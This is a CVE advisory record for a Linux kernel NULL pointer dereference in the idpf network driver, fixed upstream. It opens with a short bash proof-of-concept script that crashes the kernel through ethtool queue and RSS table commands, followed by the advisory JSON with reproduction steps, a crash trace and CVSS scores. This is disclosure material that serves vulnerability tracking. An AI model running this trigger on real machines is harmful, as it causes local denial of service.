CVE-2026-22993

#!/bin/bash # CVE-2026-22993 PoC - Trigger NULL pointer dereference in idpf driver INTERFACE=${1:-eth1} echo "[+] Triggering CVE-2026-22993: idpf RSS LUT NULL ptr dereference" # Step 1: Bring interface down ifconfig $INTERFACE down echo "[*] Interface $INTERFACE brought down" # Step 2: Update queue count ethtool -L $INTERFACE combined 20 echo "[*] Queue count updated to 20" # Step 3: Display RSS LUT - This triggers the NULL pointer dereference ethtool -x $INTERFACE echo "[!] If you see this, the bug may not trigger on this system"

{"cve": {"id": "CVE-2026-22993", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:55.393", "lastModified": "2026-04-02T12:16:19.137", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don't touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27->20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n<snip>\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] <TASK>\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n<snip>"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nidpf: Soluciona el problema de puntero NULL de la RSS LUT después de un reinicio suave\n\nDurante el reinicio suave, la RSS LUT se libera y no se restaura a menos que la interfaz esté activa. Si se intenta un comando ethtool que accede a la rss lut inmediatamente después del reinicio, resultará en una desreferencia de puntero NULL. Además, no es necesario reiniciar la rss lut si el reinicio suave no implica un cambio en el recuento de colas.\n\nDespués del reinicio suave, establece la RSS LUT a valores predeterminados basándose en el recuento de colas actualizado solo si el reinicio fue resultado de un cambio en el recuento de colas y la LUT no fue configurada por el usuario. En todos los demás casos, no modifiques la LUT.\n\nPasos para reproducir:\n\n Desactiva la interfaz (si está activa)\nifconfig eth1 down\n\n Actualiza el recuento de colas (ej., 27-&gt;20)\nethtool -L eth1 combined 20\n\n** Muestra la RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: desreferencia de puntero NULL del kernel, dirección: 0000000000000000\n[82375.558373] #PF: acceso de lectura de supervisor en modo kernel\n[82375.558391] #PF: error_code(0x0000) - página no presente\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Traza de llamada:\n[82375.558793] \n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, ... (truncated)